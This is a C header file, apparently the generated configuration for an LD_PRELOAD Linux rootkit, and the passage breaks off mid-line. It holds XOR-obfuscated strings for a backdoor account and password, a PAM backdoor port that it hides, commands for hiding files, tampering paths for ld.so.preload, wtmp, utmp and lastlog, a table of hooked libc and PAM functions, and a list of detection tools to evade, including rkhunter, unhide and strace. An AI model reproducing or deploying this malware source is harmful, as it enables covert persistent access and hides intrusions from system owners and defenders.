/* * * EXAMPLE POPULATED CONST.H HEADER FILE. * CONTENTS OF THIS FILE ARE WRITTEN BY CONFIG.PY. * PLAINTEXT STRINGS ARE XOR'D. * * THIS FILE WILL BE OVERWRITTEN DURING INSTALL. * */ // VALUES PASSED TO CONFIG.PY: // install_directory = /lib/example_install_directory // lib_location = $install_directory/example_lib_name.so.\$PLATFORM // xattr[0] = example_xattr_val_1 // xattr[1] = example_xattr_val_2 // pam_username = example_pam_username // pam_password = example_pam_password // pam_port = 6669 // ssl_status = 0 // accept_bd_password = acceptme // low_port = 98 // high_port = 100 // env_var = LOL // ptrace_bug_status = 0 // new_preload = /etc/example_new_preload #undef SSL_BACKDOOR #undef PTRACE_BUG #define MAGIC_GID 325852479 #define TERM_ENV_VAR "\xf8\xe9\xfe\xe1\x91\xd4\xd8\xc9\xde\xc1" #define VLANY_USER "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xdc\xcd\xc1\xf3\xd9\xdf\xc9\xde\xc2\xcd\xc1\xc9" #define VLANY_PASSWORD "\x88\x9a\x88\xe3\xef\xfd\xfa\xe0\xf9\xf8\xda\xeb\xe0\x94\xfe\x88\xcb\xf8\xda\xce\x9c\xe7\xc7\xda\xc6\xfc\xeb\xe6\xc7\xce\xd5\xc0\xc1\xd9\xd8\xfc\xc2\xca\xef\xc7\xca\xe8\xe7\xe0\xc9\x82\x94\xed\xdc\xde\xe0\xc1\x95\xf6\xdc\xd6\xcb\xcb\xef\xc0\xfe\x9e\x99\xe1\xc5\xe2\xc9\xe4\x9e\xef\xfd\xdc\xea\xf9\xe3\xc3\xfe\xe1\xdb\x9a\xe8\xe3\xc3\xc3\xdf\xd9\x9d\xe6\x98\xc3\x9c\xc6\xca\xf5\x82\xe0\xca\xe4\xd9\xf5\xe1\x82" #define PAM_PORT 6669 #define VLANY_PERM "\xde\xc3\xc3\xd8" #define HISTFILE "\x83\xc8\xc9\xda\x83\xc2\xd9\xc0\xc0" #define BASH_RC "\x83\xc0\xc5\xce\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5\x83\x82\xce\xcd\xdf\xc4\xde\xcf" #define SSH_PASSWORDS "\x83\xc0\xc5\xce\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5\x83\xdc\xcd\xc1\xf3\xcd\xd9\xd8\xc4\xf3\xc0\xc3\xcb\xdf" #define LOG_FORMAT "\xf9\xdf\xc9\xde\xc2\xcd\xc1\xc9\x96\x8c\x89\xdf\xa6\xfc\xcd\xdf\xdf\xdb\xc3\xde\xc8\x96\x8c\x89\xdf\xa6\xa6" #define SHELL_PASSWORD "\xcd\xcf\xcf\xc9\xdc\xd8\xc1\xc9" #define SHELL_NAME "\xda\xc0\xcd\xc2\xd5\xde\xc7" #define SHELL_TYPE "\x83\xce\xc5\xc2\x83\xce\xcd\xdf\xc4" #define LOGIN "\x81\x81\xc0\xc3\xcb\xc5\xc2" #define ENV_VAR "\xe0\xe3\xe0" #define EXECVE_PW "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc9\xd4\xc9\xcf\xda\xc9\xf3\xdc\xcd\xdf\xdf" #define TERM "\xf8\xe9\xfe\xe1\x91\xd4\xd8\xc9\xde\xc1" #define LIB_NAME "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc0\xc5\xce\xf3\xc2\xcd\xc1\xc9\x82\xdf\xc3\x82\x88\xfc\xe0\xed\xf8\xea\xe3\xfe\xe1" #define PTRACE_BUG_MSG "\xc5\xc3\x9a\xdd\xc4\xe9\xcd\xca\x95\xfd\xe6\xce\xf6\xcb\xff\xd5\xdf\xf8\xfc\xe7\x9b\xd6\xe3\xc2\xff\xcb\x99\xc5\xde\xc8\xdb\xfd\xe7\xe5\xe7\xf9\xfe\xc4\xe7\xf6\x9d\xfb\xcf\xfa\xde\xfd\xcd\x9b\xc6\x9a" #define HIDDEN_XATTR_1_STR "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xd4\xcd\xd8\xd8\xde\xf3\xda\xcd\xc0\xf3\x9d" #define HIDDEN_XATTR_2_STR "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xd4\xcd\xd8\xd8\xde\xf3\xda\xcd\xc0\xf3\x9e" #define X_USAGE "\xf9\xdf\xcd\xcb\xc9\x96\x8c\x89\xdf\x8c\xf7\xdc\xdb\xf1\x8c\xf7\x89\xdf\xf1\x8c\xf7\xdc\xc7\xcb\x8c\xc2\xcd\xc1\xc9\xf1\xa6" #define E_SMSG "\x89\xdf\x8c\xea\xe5\xe2\xe5\xff\xe4\xe9\xe8\x8c\xed\xe2\xe8\x8c\xe1\xed\xeb\xe5\xef\xf3\xeb\xe5\xe8\x8c\xfe\xe9\xff\xe9\xf8\x82\x8c\xb7\xf7\x9d\x97\x9f\x9e\xc1\xfb\xe9\x8b\xfe\xe9\x8c\xe4\xe5\xe8\xe8\xe9\xe2\x8c\xed\xeb\xed\xe5\xe2\xb7\xf7\x9c\xc1\xa6" #define GID_SET "\xff\xe9\xf8\xf8\xe5\xe2\xeb\x8c\xeb\xe5\xe8\x8c\xf8\xe3\x8c\x9c\xa6" #define XATTR "\xd9\xdf\xc9\xde\x82\x89\xdf" #define HIDE_FILE "\xc4\xc5\xc8\xc9" #define HIDE_USAGE "\xf8\xc4\xc9\x8c\xda\xc0\xcd\xc2\xd5\x8c\xca\xd9\xc2\xcf\xd8\xc5\xc3\xc2\x8c\x8b\xc4\xc5\xc8\xc9\x8b\x8c\xde\xc9\xdd\xd9\xc5\xde\xc9\xdf\x8c\xcd\x8c\xd8\xcd\xde\xcb\xc9\xd8\x8c\xdc\xcd\xd8\xc4\x8c\xd8\xc3\x8c\xc4\xc5\xc8\xc9\x8c\xc5\xc2\x8c\xd8\xc4\xc9\x8c\xdf\xc9\xcf\xc3\xc2\xc8\x8c\xcd\xde\xcb\xd9\xc1\xc9\xc2\xd8\x82\xa6\xf9\xdf\xcd\xcb\xc9\x96\x8c\x82\x83\xc4\xc5\xc8\xc9\x8c\x90\xdc\xcd\xdf\xdf\x92\x8c\x90\xdc\xcd\xd8\xc4\x92\xa6" #define HIDE_SUCCESS "\xb7\xf7\x9f\x9e\xc1\x89\xdf\x8c\xc4\xc5\xc8\xc8\xc9\xc2\x82\xb7\xf7\x9c\xc1\xa6" #define UNHIDE_FILE "\xd9\xc2\xc4\xc5\xc8\xc9" #define UNHIDE_USAGE "\xf8\xc4\xc9\x8c\xda\xc0\xcd\xc2\xd5\x8c\xca\xd9\xc2\xcf\xd8\xc5\xc3\xc2\x8c\x8b\xd9\xc2\xc4\xc5\xc8\xc9\x8b\x8c\xde\xc9\xdd\xd9\xc5\xde\xc9\xdf\x8c\xcd\x8c\xd8\xcd\xde\xcb\xc9\xd8\x8c\xdc\xcd\xd8\xc4\x8c\xd8\xc3\x8c\xd9\xc2\xc4\xc5\xc8\xc9\x8c\xc5\xc2\x8c\xd8\xc4\xc9\x8c\xdf\xc9\xcf\xc3\xc2\xc8\x8c\xcd\xde\xcb\xd9\xc1\xc9\xc2\xd8\x82\xa6\xf9\xdf\xcd\xcb\xc9\x96\x8c\x82\x83\xd9\xc2\xc4\xc5\xc8\xc9\x8c\x90\xdc\xcd\xdf\xdf\x92\x8c\x90\xdc\xcd\xd8\xc4\x92\xa6" #define UNHIDE_SUCCESS "\xb7\xf7\x9f\x9e\xc1\x89\xdf\x8c\xd9\xc2\xc4\xc5\xc8\xc8\xc9\xc2\x82\xb7\xf7\x9c\xc1\xa6" #define LIBC_PATH "\xc0\xc5\xce\xcf\x82\xdf\xc3\x82\x9a" #define LIBDL_PATH "\xc0\xc5\xce\xc8\xc0\x82\xdf\xc3\x82\x9d" #define LIBPAM_PATH "\xc0\xc5\xce\xdc\xcd\xc1\x82\xdf\xc3\x82\x9c" #define LD_LINUX_SO_PATH "\x86\x83\x86\xc0\xc8\x81\xc0\xc5\xc2\xd9\xd4\x86\x82\xdf\xc3\x82\x86" #define LD_SO_PATH "\x86\x83\x86\xc0\xc8\x81\x86\x82\xdf\xc3" #define LD_TRACE_ENV_VAR "\xe0\xe8\xf3\xf8\xfe\xed\xef\xe9\xf3\xe0\xe3\xed\xe8\xe9\xe8\xf3\xe3\xee\xe6\xe9\xef\xf8\xff\x91" #define LD_DEBUG_ENV_VAR "\xe0\xe8\xf3\xe8\xe9\xee\xf9\xeb\x91" #define LD_AUDIT_ENV_VAR "\xe0\xe8\xf3\xed\xf9\xe8\xe5\xf8\x91" #define LD_AUDIT_GETENV "\xe0\xe8\xf3\xed\xf9\xe8\xe5\xf8" #define HELP "\xc4\xc9\xc0\xdc" #define LD_PRELOAD "\x83\xc9\xd8\xcf\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc2\xc9\xdb\xf3\xdc\xde\xc9\xc0\xc3\xcd\xc8" #define LD_PRELOAD_ETC "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc2\xc9\xdb\xf3\xdc\xde\xc9\xc0\xc3\xcd\xc8" #define LD_PRELOAD_ENV "\xe0\xe8\xf3\xfc\xfe\xe9\xe0\xe3\xed\xe8" #define INSTALL "\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5" #define INSTALL_DIR "\x83\xc0\xc5\xce\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5" #define LIB_LOCATION "\x83\xc0\xc5\xce\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc5\xc2\xdf\xd8\xcd\xc0\xc0\xf3\xc8\xc5\xde\xc9\xcf\xd8\xc3\xde\xd5\x83\xc9\xd4\xcd\xc1\xdc\xc0\xc9\xf3\xc0\xc5\xce\xf3\xc2\xcd\xc1\xc9\x82\xdf\xc3\x82\x88\xfc\xe0\xed\xf8\xea\xe3\xfe\xe1" #define PROC_NET_TCP "\x83\xdc\xde\xc3\xcf\x83\xc2\xc9\xd8\x83\xd8\xcf\xdc" #define PROC_NET_TCP6 "\x83\xdc\xde\xc3\xcf\x83\xc2\xc9\xd8\x83\xd8\xcf\xdc\x9a" #define PROC_NET_STRING "\x89\xc8\x96\x8c\x89\x9a\x98\xf7\x9c\x81\x95\xed\x81\xea\xcd\x81\xca\xf1\x96\x89\xf4\x8c\x89\x9a\x98\xf7\x9c\x81\x95\xed\x81\xea\xcd\x81\xca\xf1\x96\x89\xf4\x8c\x89\xf4\x8c\x89\xc0\xf4\x96\x89\xc0\xf4\x8c\x89\xf4\x96\x89\xc0\xf4\x8c\x89\xc0\xf4\x8c\x89\xc8\x8c\x89\xc8\x8c\x89\xc0\xd9\x8c\x89\x99\x9d\x9e\xdf\xf0\xc2" #define PROC_PATH "\x83\xdc\xde\xc3\xcf\x83" #define PROC_ID "\x83\xdc\xde\xc3\xcf\x83\x89\xdf" #define MAPS_PATH "\x83\xdc\xde\xc3\xcf\x83\x89\xc8\x83\xc1\xcd\xdc\xdf" #define FAKEMAPS_FILE "\x83\xd8\xc1\xdc\x83\x89\xc8\x82\xca\xcd\xc7\xc9\xc1\xcd\xdc\xdf" #define S_FSIZE 625824 #define ENV_LINE "\x89\xdf\x83\xc9\xc2\xda\xc5\xde\xc3\xc2" #define CMD_LINE "\x89\xdf\x83\xcf\xc1\xc8\xc0\xc5\xc2\xc9" #define CMDLINE_SELF "\x83\xdc\xde\xc3\xcf\x83\xdf\xc9\xc0\xca\x83\xcf\xc1\xc8\xc0\xc5\xc2\xc9" #define BASH "\x83\xce\xc5\xc2\x83\xce\xcd\xdf\xc4\x8c\x81\x81\xc0\xc3\xcb\xc5\xc2" #define _WTMP_FILE "\x83\xda\xcd\xde\x83\xc0\xc3\xcb\x83\xdb\xd8\xc1\xdc" #define _UTMP_FILE "\x83\xda\xcd\xde\x83\xde\xd9\xc2\x83\xd9\xd8\xc1\xdc" #define LASTLOG "\x83\xda\xcd\xde\x83\xc0\xc3\xcb\x83\xc0\xcd\xdf\xd8\xc0\xc3\xcb" #define FAKE_LASTLOG_FILE "\x99" #define LOW_PORT 98 #define HIGH_PORT 100 #define SSL_CIPHER_LIST "\xed\xe0\xe0\x96\x8d\xed\xe8\xe4\x96\x8d\xe0\xe3\xfb\x96\x8d\xe9\xf4\xfc\x96\x8d\xe1\xe8\x99\x96\xec\xff\xf8\xfe\xe9\xe2\xeb\xf8\xe4" #define SUBJECT_ALT_NAME "\xdf\xd9\xce\xc6\xc9\xcf\xd8\xed\xc0\xd8\xe2\xcd\xc1\xc9" #define NS_COMMENT "\xc2\xdf\xef\xc3\xc1\xc1\xc9\xc2\xd8" #define COMMON_NAME "\xcf\xc3\xc1\xc1\xc3\xc2\xe2\xcd\xc1\xc9" #define COMMON_NAME_HOST "\xc0\xc3\xcf\xcd\xc0\xc4\xc3\xdf\xd8" #define DNS "\xe8\xe2\xff\x96" #define DEFAULT_KEY_BITS 1024 #define DEFAULT_CERT_DURATION 31536000 #define CERTIFICATE_COMMENT "\xcd\xd9\xd8\xc3" #define DEFAULT_TCP_BUF_LEN 8192 #define MAX_LEN 4125 #define CRENAME 0 #define CRENAMEAT 1 #define CRENAMEAT2 2 #define CFREAD 3 #define CSTAT 4 #define CSTAT64 5 #define CFSTAT 6 #define CFSTAT64 7 #define CFSTATAT 8 #define CFSTATAT64 9 #define CLSTAT 10 #define CLSTAT64 11 #define C__LXSTAT 12 #define C__LXSTAT64 13 #define C__FXSTAT 14 #define C__FXSTAT64 15 #define C__XSTAT 16 #define C__XSTAT64 17 #define CFGETS 18 #define CFGETFLAGS 19 #define CFSETFLAGS 20 #define CPTRACE 21 #define CFWRITE 22 #define CFWRITE_UNLOCKED 23 #define CFPUTS_UNLOCKED 24 #define CEXECVE 25 #define CEXECVP 26 #define CLINK 27 #define CLINKAT 28 #define CUNLINK 29 #define CUNLINKAT 30 #define CSYMLINK 31 #define CSYMLINKAT 32 #define CMKDIR 33 #define CMKDIRAT 34 #define CRMDIR 35 #define COPENDIR 36 #define COPENDIR64 37 #define CFDOPENDIR 38 #define CREADDIR 39 #define CREADDIR64 40 #define CCHDIR 41 #define CFCHDIR 42 #define CACCESS 43 #define COPEN 44 #define COPEN64 45 #define CFOPEN 46 #define CFOPEN64 47 #define CCREAT 48 #define CMKSTEMP 49 #define CACCEPT 50 #define CSETGID 51 #define CSETREGID 52 #define CSETRESGID 53 #define CPAM_AUTHENTICATE 54 #define CPAM_OPEN_SESSION 55 #define CPAM_ACCT_MGMT 56 #define CGETPWNAM_R 57 #define CGETPWNAM 58 #define CGETSPNAM 59 #define CGETPWUID 60 #define CKILL 61 #define CCHMOD 62 #define CCHOWN 63 #define CFCHMOD 64 #define CFCHOWN 65 #define CFCHOWNAT 66 #define CLCHOWN 67 #define CLISTXATTR 68 #define CLLISTXATTR 69 #define CFLISTXATTR 70 #define CGETXATTR 71 #define CLGETXATTR 72 #define CFGETXATTR 73 #define CSETXATTR 74 #define CLSETXATTR 75 #define CFSETXATTR 76 #define CREMOVEXATTR 77 #define CLREMOVEXATTR 78 #define CFREMOVEXATTR 79 #define CAUDIT_LOG_ACCT_MESSAGE 80 #define CAUDIT_LOG_USER_MESSAGE 81 #define CAUDIT_SEND 82 #define CGETUTENT 83 #define CGETUTXENT 84 #define CPUTUTLINE 85 #define CPCAP_LOOP 86 #define CGETPWENT 87 #define CSYSLOG 88 #define C__SYSLOG_CHK 89 #define CDLADDR 90 #define CDLINFO 91 #define CDLSYM 92 #define CSOCKET 93 #define CLOGIN 94 #define CSETEGID 95 #define CPUTUTXLINE 96 #define CGETUTID 97 #define CGETUTXID 98 #define CGETUTMP 99 #define CGETUTMPX 100 #define CUPDWTMP 101 #define CUPDWTMPX 102 #define _CSIZE 103 static char *calls[_CSIZE] = {"\xde\xc9\xc2\xcd\xc1\xc9","\xde\xc9\xc2\xcd\xc1\xc9\xcd\xd8","\xde\xc9\xc2\xcd\xc1\xc9\xcd\xd8\x9e","\xca\xde\xc9\xcd\xc8","\xdf\xd8\xcd\xd8","\xdf\xd8\xcd\xd8\x9a\x98","\xca\xdf\xd8\xcd\xd8","\xca\xdf\xd8\xcd\xd8\x9a\x98","\xca\xdf\xd8\xcd\xd8\xcd\xd8","\xca\xdf\xd8\xcd\xd8\xcd\xd8\x9a\x98","\xc0\xdf\xd8\xcd\xd8","\xc0\xdf\xd8\xcd\xd8\x9a\x98","\xf3\xf3\xc0\xd4\xdf\xd8\xcd\xd8","\xf3\xf3\xc0\xd4\xdf\xd8\xcd\xd8\x9a\x98","\xf3\xf3\xca\xd4\xdf\xd8\xcd\xd8","\xf3\xf3\xca\xd4\xdf\xd8\xcd\xd8\x9a\x98","\xf3\xf3\xd4\xdf\xd8\xcd\xd8","\xf3\xf3\xd4\xdf\xd8\xcd\xd8\x9a\x98","\xca\xcb\xc9\xd8\xdf","\xca\xcb\xc9\xd8\xca\xc0\xcd\xcb\xdf","\xca\xdf\xc9\xd8\xca\xc0\xcd\xcb\xdf","\xdc\xd8\xde\xcd\xcf\xc9","\xca\xdb\xde\xc5\xd8\xc9","\xca\xdb\xde\xc5\xd8\xc9\xf3\xd9\xc2\xc0\xc3\xcf\xc7\xc9\xc8","\xca\xdc\xd9\xd8\xdf\xf3\xd9\xc2\xc0\xc3\xcf\xc7\xc9\xc8","\xc9\xd4\xc9\xcf\xda\xc9","\xc9\xd4\xc9\xcf\xda\xdc","\xc0\xc5\xc2\xc7","\xc0\xc5\xc2\xc7\xcd\xd8","\xd9\xc2\xc0\xc5\xc2\xc7","\xd9\xc2\xc0\xc5\xc2\xc7\xcd\xd8","\xdf\xd5\xc1\xc0\xc5\xc2\xc7","\xdf\xd5\xc1\xc0\xc5\xc2\xc7\xcd\xd8","\xc1\xc7\xc8\xc5\xde","\xc1\xc7\xc8\xc5\xde\xcd\xd8","\xde\xc1\xc8\xc5\xde","\xc3\xdc\xc9\xc2\xc8\xc5\xde","\xc3\xdc\xc9\xc2\xc8\xc5\xde\x9a\x98","\xca\xc8\xc3\xdc\xc9\xc2\xc8\xc5\xde","\xde\xc9\xcd\xc8\xc8\xc5\xde","\xde\xc9\xcd\xc8\xc8\xc5\xde\x9a\x98","\xcf\xc4\xc8\xc5\xde","\xca\xcf\xc4\xc8\xc5\xde","\xcd\xcf\xcf\xc9\xdf\xdf","\xc3\xdc\xc9\xc2","\xc3\xdc\xc9\xc2\x9a\x98","\xca\xc3\xdc\xc9\xc2","\xca\xc3\xdc\xc9\xc2\x9a\x98","\xcf\xde\xc9\xcd\xd8","\xc1\xc7\xdf\xd8\xc9\xc1\xdc","\xcd\xcf\xcf\xc9\xdc\xd8","\xdf\xc9\xd8\xcb\xc5\xc8","\xdf\xc9\xd8\xde\xc9\xcb\xc5\xc8","\xdf\xc9\xd8\xde\xc9\xdf\xcb\xc5\xc8","\xdc\xcd\xc1\xf3\xcd\xd9\xd8\xc4\xc9\xc2\xd8\xc5\xcf\xcd\xd8\xc9","\xdc\xcd\xc1\xf3\xc3\xdc\xc9\xc2\xf3\xdf\xc9\xdf\xdf\xc5\xc3\xc2","\xdc\xcd\xc1\xf3\xcd\xcf\xcf\xd8\xf3\xc1\xcb\xc1\xd8","\xcb\xc9\xd8\xdc\xdb\xc2\xcd\xc1\xf3\xde","\xcb\xc9\xd8\xdc\xdb\xc2\xcd\xc1","\xcb\xc9\xd8\xdf\xdc\xc2\xcd\xc1","\xcb\xc9\xd8\xdc\xdb\xd9\xc5\xc8","\xc7\xc5\xc0\xc0","\xcf\xc4\xc1\xc3\xc8","\xcf\xc4\xc3\xdb\xc2","\xca\xcf\xc4\xc1\xc3\xc8","\xca\xcf\xc4\xc3\xdb\xc2","\xca\xcf\xc4\xc3\xdb\xc2\xcd\xd8","\xc0\xcf\xc4\xc3\xdb\xc2","\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde","\xc0\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde","\xca\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde","\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xc0\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xca\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xc0\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xca\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde","\xc0\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde","\xca\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde","\xcd\xd9\xc8\xc5\xd8\xf3\xc0\xc3\xcb\xf3\xcd\xcf\xcf\xd8\xf3\xc1\xc9\xdf\xdf\xcd\xcb\xc9","\xcd\xd9\xc8\xc5\xd8\xf3\xc0\xc3\xcb\xf3\xd9\xdf\xc9\xde\xf3\xc1\xc9\xdf\xdf\xcd\xcb\xc9","\xcd\xd9\xc8\xc5\xd8\xf3\xdf\xc9\xc2\xc8","\xcb\xc9\xd8\xd9\xd8\xc9\xc2\xd8","\xcb\xc9\xd8\xd9\xd8\xd4\xc9\xc2\xd8","\xdc\xd9\xd8\xd9\xd8\xc0\xc5\xc2\xc9","\xdc\xcf\xcd\xdc\xf3\xc0\xc3\xc3\xdc","\xcb\xc9\xd8\xdc\xdb\xc9\xc2\xd8","\xdf\xd5\xdf\xc0\xc3\xcb","\xf3\xf3\xdf\xd5\xdf\xc0\xc3\xcb\xf3\xcf\xc4\xc7","\xc8\xc0\xcd\xc8\xc8\xde","\xc8\xc0\xc5\xc2\xca\xc3","\xc8\xc0\xdf\xd5\xc1","\xdf\xc3\xcf\xc7\xc9\xd8","\xc0\xc3\xcb\xc5\xc2","\xdf\xc9\xd8\xc9\xcb\xc5\xc8","\xdc\xd9\xd8\xd9\xd8\xd4\xc0\xc5\xc2\xc9","\xcb\xc9\xd8\xd9\xd8\xc5\xc8","\xcb\xc9\xd8\xd9\xd8\xd4\xc5\xc8","\xcb\xc9\xd8\xd9\xd8\xc1\xdc","\xcb\xc9\xd8\xd9\xd8\xc1\xdc\xd4","\xd9\xdc\xc8\xdb\xd8\xc1\xdc","\xd9\xdc\xc8\xdb\xd8\xc1\xdc\xd4"}; #define LIBC_SIZE 93 static char *libc_calls[LIBC_SIZE] = {"\xde\xc9\xc2\xcd\xc1\xc9","\xde\xc9\xc2\xcd\xc1\xc9\xcd\xd8","\xde\xc9\xc2\xcd\xc1\xc9\xcd\xd8\x9e","\xca\xde\xc9\xcd\xc8","\xdf\xd8\xcd\xd8","\xdf\xd8\xcd\xd8\x9a\x98","\xca\xdf\xd8\xcd\xd8","\xca\xdf\xd8\xcd\xd8\x9a\x98","\xca\xdf\xd8\xcd\xd8\xcd\xd8","\xca\xdf\xd8\xcd\xd8\xcd\xd8\x9a\x98","\xc0\xdf\xd8\xcd\xd8","\xc0\xdf\xd8\xcd\xd8\x9a\x98","\xf3\xf3\xc0\xd4\xdf\xd8\xcd\xd8","\xf3\xf3\xc0\xd4\xdf\xd8\xcd\xd8\x9a\x98","\xf3\xf3\xca\xd4\xdf\xd8\xcd\xd8","\xf3\xf3\xca\xd4\xdf\xd8\xcd\xd8\x9a\x98","\xf3\xf3\xd4\xdf\xd8\xcd\xd8","\xf3\xf3\xd4\xdf\xd8\xcd\xd8\x9a\x98","\xdc\xd8\xde\xcd\xcf\xc9","\xca\xdb\xde\xc5\xd8\xc9","\xca\xdb\xde\xc5\xd8\xc9\xf3\xd9\xc2\xc0\xc3\xcf\xc7\xc9\xc8","\xca\xdc\xd9\xd8\xdf\xf3\xd9\xc2\xc0\xc3\xcf\xc7\xc9\xc8","\xca\xcb\xc9\xd8\xdf","\xca\xcb\xc9\xd8\xca\xc0\xcd\xcb\xdf","\xca\xdf\xc9\xd8\xca\xc0\xcd\xcb\xdf","\xc9\xd4\xc9\xcf\xda\xc9","\xc9\xd4\xc9\xcf\xda\xdc","\xc0\xc5\xc2\xc7","\xc0\xc5\xc2\xc7\xcd\xd8","\xd9\xc2\xc0\xc5\xc2\xc7","\xd9\xc2\xc0\xc5\xc2\xc7\xcd\xd8","\xdf\xd5\xc1\xc0\xc5\xc2\xc7","\xdf\xd5\xc1\xc0\xc5\xc2\xc7\xcd\xd8","\xc1\xc7\xc8\xc5\xde","\xc1\xc7\xc8\xc5\xde\xcd\xd8","\xde\xc1\xc8\xc5\xde","\xc3\xdc\xc9\xc2\xc8\xc5\xde","\xc3\xdc\xc9\xc2\xc8\xc5\xde\x9a\x98","\xca\xc8\xc3\xdc\xc9\xc2\xc8\xc5\xde","\xde\xc9\xcd\xc8\xc8\xc5\xde","\xde\xc9\xcd\xc8\xc8\xc5\xde\x9a\x98","\xcf\xc4\xc8\xc5\xde","\xca\xcf\xc4\xc8\xc5\xde","\xcd\xcf\xcf\xc9\xdf\xdf","\xc3\xdc\xc9\xc2","\xc3\xdc\xc9\xc2\x9a\x98","\xca\xc3\xdc\xc9\xc2","\xca\xc3\xdc\xc9\xc2\x9a\x98","\xcf\xde\xc9\xcd\xd8","\xc1\xc7\xdf\xd8\xc9\xc1\xdc","\xcd\xcf\xcf\xc9\xdc\xd8","\xdf\xc9\xd8\xcb\xc5\xc8","\xdf\xc9\xd8\xde\xc9\xcb\xc5\xc8","\xdf\xc9\xd8\xde\xc9\xdf\xcb\xc5\xc8","\xcb\xc9\xd8\xdc\xdb\xc2\xcd\xc1\xf3\xde","\xcb\xc9\xd8\xdc\xdb\xc2\xcd\xc1","\xcb\xc9\xd8\xdf\xdc\xc2\xcd\xc1","\xcb\xc9\xd8\xdc\xdb\xd9\xc5\xc8","\xc7\xc5\xc0\xc0","\xcf\xc4\xc1\xc3\xc8","\xcf\xc4\xc3\xdb\xc2","\xca\xcf\xc4\xc1\xc3\xc8","\xca\xcf\xc4\xc3\xdb\xc2","\xca\xcf\xc4\xc3\xdb\xc2\xcd\xd8","\xc0\xcf\xc4\xc3\xdb\xc2","\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde","\xc0\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde","\xca\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde","\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xc0\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xca\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xc0\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xca\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde","\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde","\xc0\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde","\xca\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde","\xcb\xc9\xd8\xd9\xd8\xc9\xc2\xd8","\xcb\xc9\xd8\xd9\xd8\xd4\xc9\xc2\xd8","\xdc\xd9\xd8\xd9\xd8\xc0\xc5\xc2\xc9","\xcb\xc9\xd8\xdc\xdb\xc9\xc2\xd8","\xdf\xd5\xdf\xc0\xc3\xcb","\xf3\xf3\xdf\xd5\xdf\xc0\xc3\xcb\xf3\xcf\xc4\xc7","\xdf\xc3\xcf\xc7\xc9\xd8","\xc0\xc3\xcb\xc5\xc2","\xdf\xc9\xd8\xc9\xcb\xc5\xc8","\xdc\xd9\xd8\xd9\xd8\xd4\xc0\xc5\xc2\xc9","\xcb\xc9\xd8\xd9\xd8\xc5\xc8","\xcb\xc9\xd8\xd9\xd8\xd4\xc5\xc8","\xcb\xc9\xd8\xd9\xd8\xc1\xdc","\xcb\xc9\xd8\xd9\xd8\xc1\xdc\xd4","\xd9\xdc\xc8\xdb\xd8\xc1\xdc","\xd9\xdc\xc8\xdb\xd8\xc1\xdc\xd4"}; #define LIBDL_SIZE 3 static char *libdl_calls[LIBDL_SIZE] = {"\xc8\xc0\xcd\xc8\xc8\xde","\xc8\xc0\xc5\xc2\xca\xc3","\xc8\xc0\xdf\xd5\xc1"}; #define LIBPAM_SIZE 3 static char *libpam_calls[LIBPAM_SIZE] = {"\xdc\xcd\xc1\xf3\xcd\xd9\xd8\xc4\xc9\xc2\xd8\xc5\xcf\xcd\xd8\xc9","\xdc\xcd\xc1\xf3\xc3\xdc\xc9\xc2\xf3\xdf\xc9\xdf\xdf\xc5\xc3\xc2","\xdc\xcd\xc1\xf3\xcd\xcf\xcf\xd8\xf3\xc1\xcb\xc1\xd8"}; #define GPSIZE 8 static char *gay_procs_list[GPSIZE] = {"\xc0\xc8\xc8","\xd9\xc2\xc4\xc5\xc8\xc9","\xde\xc7\xc4\xd9\xc2\xd8\xc9\xde","\xcf\xc4\xc7\xdc\xde\xc3\xcf","\xcf\xc4\xc7\xc8\xc5\xde\xdf","\xc0\xd8\xde\xcd\xcf\xc9","\xdf\xd8\xde\xcd\xcf\xc9","\xe0\xe8\xf3\xed\xf9\xe8\xe5\xf8"}; int hidden_ports[] = {6669,-1}; #define HOOK(old_sym, sym) if(!old_sym) old_sym = get_symbol(RTLD_NEXT, sym) #define 